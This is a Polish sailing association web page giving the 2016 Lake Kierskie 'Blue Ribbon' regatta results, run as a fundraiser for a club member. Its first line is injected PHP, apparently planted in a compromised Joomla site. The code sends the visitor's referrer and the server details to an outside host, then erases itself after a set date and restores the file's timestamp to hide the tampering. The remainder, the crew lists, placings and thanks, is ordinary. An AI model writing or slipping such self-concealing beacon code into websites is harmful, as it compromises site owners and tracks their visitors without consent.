check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Błękitna Wstęga Jeziora Kierskiego 2016 - Wyniki

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Klasyfikacja Jachtów Turystycznych Błękitna Wstęga Jeziora Kierskiego 2016 - Wyniki
Jak co roku ostatnimi regatami na jeziorze kierskim była ,,Błękitna Wstęga Jeziora Kierskiego”. W tym roku z inicjatywy żeglarzy naszego okręgu forma regat została zmieniona. Dodano dodatkowe regaty / wyścig z podziałem na klasy sportowe. Zmiana formuły była podyktowana chęcią zebrania pieniędzy na leczenie naszego kolegi Wojtka Zabłockiego. Wszyscy przy regatach pracowali za darmo a całe wpisowe zostało przeznaczone dla Wojtka. Dzięki Wam i i wsparciu akcji przez firmę VIKO Yachts zebraliśmy prawie 11.000zł!!! Nasza rodzina żeglarska jest Wielka!!!
 
W imieniu Wojtka i Zarządu WOZŻ bardzo dziękujemy.
Za Zarząd WOZŻ
Dariusz SIBILSKI
 

Zapraszamy do zapoznania się z wynikami regat proszę kliknąć [Więcej...]

lub link z wynikami regat: Błękitna Wstęga Jeziora Kierskiego 2016   

 Błękitna Wstęga Jeziora Kierskiego

REGATY BŁĘKITNA WSTĘGA JEZIORA KIERSKIEGO

REGATY WSPARCIA DLA WOJTKA

Klasy turystyczno-sport OPEN

Poznań, dn. 15.10.2016

WYNIKI OFICJALNE

Miejsce

Nr oznaczenie jachtu

ZAŁOGA nazwisko imię

Klub

Wyścig 1

1

CHOCOLISSIMO GANG DELPHIA 24 POL 27

MARIUSZ TRZCIŃSKI           BŁAŻEJ ŁUKOMSKI         PAWEŁ KURZAWA       DAMIAN DEBICKI

JKW POZNAŃ

1

2

INDYGO POL 9

PIOTR KOWALEWSKI           JERZY DOMAŃSKI         MARZENA POMIANOWICZ MAKS KOWALEWSKI

JKW POZNAŃ

2

3

KOŁOBRZEG

 

AZS POZNAŃ

3

4

PRODATA NAUTICA 450 POL 55

WITOLD MAŁECKI               MACIEJ ODWAŻNY

PRODATA SAILING TEAM

4

5

LASER 5000         GBR 5245

JAROSŁAW WACHOWIAK MAREK ŚMIGLAK

 

5

6

SIGMA ACTIVE     POL 7

MACIEJ KAMIŃSKI                 KATARZYNA KAMIŃSKA MAREK KAMIŃSKI

RJKP

6

7

OMEGA 1 *

 

 

7

8

OMEGA 146

ADAM MARCINKOWSKI         DARIUSZ FABIŚ                       MACIEJ ZALEWSKI

PKM LOK POZNAŃ

8

9

OMEGA 104 PIRATKA

KRZYSZTOF SIWIEC       ŁUKASZ KWIATKOWSKI GRZEGORZ KĘSTOWICZ

JKW POZNAŃ

9

10

BLASK ORIONA   PO 1119

ROBERT UNRUH ALEKSANDER UNRUH

WAGABUNDA

10

11

OMEGA       NIEBIESKA NIVEA

DOMINIK PAWŁOWSKI KRZYSZTOF MRÓZ             MARCIN GRABOWSKI

AZS POZNAŃ

11

12

ORION ARLET

LONGIN ŻEBERSKI PZREYMYSŁAW KSOBICH MIKOŁAJ KSOBICH

PKM LOK POZNAŃ

12

13

420 1

JASTRZĘBSKI MAREK         ELA ANDRZEJEWSKA

PKM LOK POZNAŃ

13

14

OMEGA               CZARNA ROZPACZ

FILIP WACŁAWIK           MAGDALENA NIKLAS   MIESZKO JARONIEWSKI

PKM LOK

14

15

ZORRO

GRZEGORZ WAWRZYNIAK TOMASZ HERWERT

JKW POZNAŃ

15

16

MAK 183*

 

 

16

17

DELPHIA 24 RYBACCY

MARIUSZ SKOWROŃSKI MAREK KOWALSKI           BARTOSZ ZACHCIAŁ

PKM LOK POZNAŃ

17

18

49ER

WOJCIECH AUGUSTYNIAK MICHAŁ CZEKALSKI

SZKWAŁ

18

19

RAJA ZĘBATA       PO 140

MAREK BERKAU           REMIGIUSZ CWOJDZIŃSKI ARKADIUSZ NITSCHKE

PKM LOK

19

0

FINN POL 6

STANISŁAW DOBANIEWICZ

AZS POZNAŃ

 

0

FINN POL 56

RYSZARD BLASZKA

AZS POZNAŃ

 

0

POL 33

MACIEJ JANKOWSKI               MICHAŁ LENKIEIWICZ           TOMASZ FRIEDEL             ADAM SZYBURSKI

JKW POZNAŃ

 

0

PILOT

WŁODZIMIERZ NOWAK ŁUKASZ SOKOŁOWSKI

ŻMKS POZNAŃ

 

0

SATURN 720 VITALINIA

LESZEK MANIA                     DOMINIK MANIA

MZKS

 

0

VETRO BALTIMER 49ER

GÓRECKI MACIEJ NURKOWSKI PAWEŁ PIŃCZYŃSKI MARCIN

 

 

0

ENIGMA NARCYZ

KACZOROWSKI ANDRZEJ KACZOROWSKI ANDRZEJ

ŻMKS POZNAN

 

0

OMEGA

TOMASZ CZARNECKI       MAKS PAWŁOWSKI             MAREK MARCINIAK             MONIKA GÓRNA

AZS POZNAŃ

 

0

BLUE BIRD VA 1371

KRZYSZTOF HAUFA         ARTUR CWOJDZIŃSKI

PKM LOK POZNAŃ

 

0

MAK MC GYVER

RADOSŁAW MARCINKOWSKI JOANNA RYNOWIEC MARIANNA MACIEJEWSKA JULIANNA MACIEJEWSKA

KŻ UAM

 

0

ŚLIMAK BŁYSKAWICA VENUS D-2402

PIOTR KROMSKI

KŻ MEWA POZNAŃ

 

0

ROZKOSZNA SASANKA

ARTUR WŁOCH               MICHAŁ WŁOCH                     MICHAŁ JARUGA

KŻ MEWA POZNAŃ

 

0

OMEGA WAGABUNDA

JACEK JANCZAK           MARCIN PRZYBYLSKI     MARIAN KASSNER

WAGABUNDA

 

0

SASANKA 620 KRYSTYNA PO 441

JERZY WOJTERA
KAROL ZENTNER
SZYMON ŚLÓSARSKI

JKW POZNAŃ

 

0

OMEGA KANALIA

TOMASZ SZUWALSKI     PATRYK STREMICH                 PAWEŁ MALEWSKI

PKM LOK POZNAŃ

 

0

CADET 9644

JAN PILARSKI                       ADAM URBANIAK

ŻLKS POZNAŃ

 

0

CADET 9489

STANISŁAW CWOJDZIŃSKI IGOR HAUFA

ŻLKS POZNAŃ

 

* ŁODZIE NIE ZGŁOSZONE

Kierunek i siła wiatru

E 6-7

Sekretarz Regat

Sędzia Główny

Ewa Krzywiak

Krzysztof Witczak

 

 

REGATY WSPARCIA DLA WOJTKA

Klasy SPORTOWE

Poznań 15.10.2016

 

 

WYNIKI OFICJALNE

 

 

 

Miejsce

KLASA Nr jachtu

ZAŁOGA nazwisko imię

 

ROCZNIK

Klub

Wyścig 1

 

LASER 4,7 LAR S

 

 

 

 

1

POL 156889

JAROSŁAW LIBENKO

0

AZS POZNAŃ

1

2

POL 201561

ANNA MICHALSKA

99

UKŻ WIKING TORUŃ

2

3

POL 160406

PATRYK ZEBERSKI

98

PKM LOK POZNAŃ

3

4

POL 186235

AGNIESZKA GRZESIAK

96

AZS POZNAŃ

4

5

POL 146584

WIKTOR GROCHOLEWSKI

2

AZS POZNAŃ

5

6

POL 195304

HUBERT SOKOŁOWSKI

0

AZS POZNAŃ

6

7

POL 11

JAN ZABŁOCKI

99

ŻLKS POZNAŃ

7

8

POL 206488

JULIA SIECZKOWSKA

99

ŻLKS POZNAŃ

8

9

POL 166584

MAREK BORKOWSKI

77

AZS POZNAŃ

9

10

POL 167931

JULIA TOMASZEWSKA

1

AZS POZNAŃ

10

11

POL 16361

MAURYCY ROBAKOWSKI

1

ŻLKS POZNAŃ

11

12

POL 164980

ALEKSANDRA PUZYNA

99

ŻLKS POZNAŃ

12

13

POL 180724

HUBERT ROSZYK

5

ŻLKS POZNAŃ

13

DNC

POL 1

JACEK ROSZYK

 

ŻLKS POZNAŃ

DNC

DNC

POL 209038

DAWID KANIA

 

ŻLKS POZNAŃ

DNC

DNC

POL 208733

WIKTORIA LEHMANN

 

ŻLKS POZNAŃ

DNC

 

EUROPA

 

 

 

 

1

POL 6

ŁUKASZ WŁOCH

95

KŻ MEWA POZNAŃ

1

2

POL 98

DAMIAN SIECZKOWSKI

74

ŻLKS POZNAŃ

2

3

POL 115

AGNIESZKA KIEŁCZEWSKA

70

JKW POZNAŃ

3

4

POL 71

BARTOSZ KOWLACZYK

0

ŻLKS POZNAŃ

4

DNC

POL 36

JOANNA MAŁYSZKA

 

KŻ MEWA POZNAŃ

DNC

DNC

POL 8

JANUSZ KNASIECKI

 

ŻLKS POZNAŃ

DNC

DNC

POL 9

ANNA WITCZAK

74

ŻLKS POZNAŃ

DNC

 

OK DINGHY

 

 

 

 

1

POL 31

ANTONI PAWŁOWSKI

 

AZS POZNAŃ

1

2

POL 10*

JANUSZ STOBIŃSKI

 

AZS POZNAŃ

2

DNC

POL 27

JAKUB KANIA

 

ŻLKS POZNAŃ

DNC

DNC

POL 161

PAWEŁ KROMSKI

 

KŻ MEWA POZNAŃ

DNC

 

TECHNO

 

 

 

 

1

POL 1556

MARTA POPŁONYK

 

AZS POZNAŃ

1

2

POL 998

JEREMI BUDZAJ

2

AZS POZNAŃ

2

3

POL 26

BARTOSZ PAŚKA

 

AZS POZNAŃ

3

4

POL 150

MICHAŁ KRAWCZYK

 

AZS POZNAŃ

4

5

POL 38

ŁUKASZ PAŚKA

4

AZS POZNAŃ

5

6

POL 69

PATRYK ROŻAK

3

AZS POZNAŃ

6

DNC

POL 98

ANTONI BUDZAJ

4

AZS POZNAŃ

DNC

 

SŁONKA

 

 

 

 

1

POL 30644

PIOTR MAŃCZAK             FILADELFIA BACHORZ

 

ŻLKS POZNAŃ

1

2

POL 29411

ŁUKASZ SOKOŁOWSKI     PIOTR SOKOŁOWSKI

 

ŻLKS POZNAŃ

2

3

POL 30268

WOJCIECH WŁÓDARCZAK MACIEJ BERKAU

 

PKM LOK POZNAŃ

3

4

POL 22444

KRZYSZTOF SULEJEWSKI JERZY KUNCEWICZ

 

ŻLKS POZNAŃ

4

5

POL 38644

PAULINA BŁOCH           ZUZANNA KASEJA

 

ŻLKS POZNAŃ

5

DNC

POL BN

JAROSŁAW KLIMCZYK     MAREK BERKAU

 

PKM LOK POZNAŃ

DNC

DNC

POL 29894

ŁUKASZ SOKOŁOWSKI PIOTR SOKOŁOWSKI

 

ŻLKS POZNAŃ

DNC

DNC

POL 30535

DARIUSZ SIBILSKI MAGDALENA SIBILSKA

 

ŻLKS POZNAŃ

DNC

DNC

POL 28221

DAWID MARCZAK PRZEMYSŁAW SKOWROŃSKI

 

ŻLKS POZNAŃ

DNC

DNC

POL 29531

ANDRZEJ GROCHOLEWSKI JOANNA GROCHOLEWSKA

 

AZS POZNAŃ

DNC

 

505

 

 

 

 

1

505 POL 8736

ADAM KUCZYŃSKI         ANDRZEJ BOROWIAK

 

ŻMKS POZNAŃ

1

2

505 POL 7942

ANNA ZABLOCKA MICHAŁ PROŃCZUK

 

ŻLKS POZNAŃ

2

3

505 POL 8437

MACIEJ KACHLICKI       KACPER KACZMAREK

 

AZS POZNAŃ

3

Kierunek i siła wiatru

E 6-7

Sekretarz Regat

Sędzia Główny

Ewa Krzywiak

Krzysztof Witczak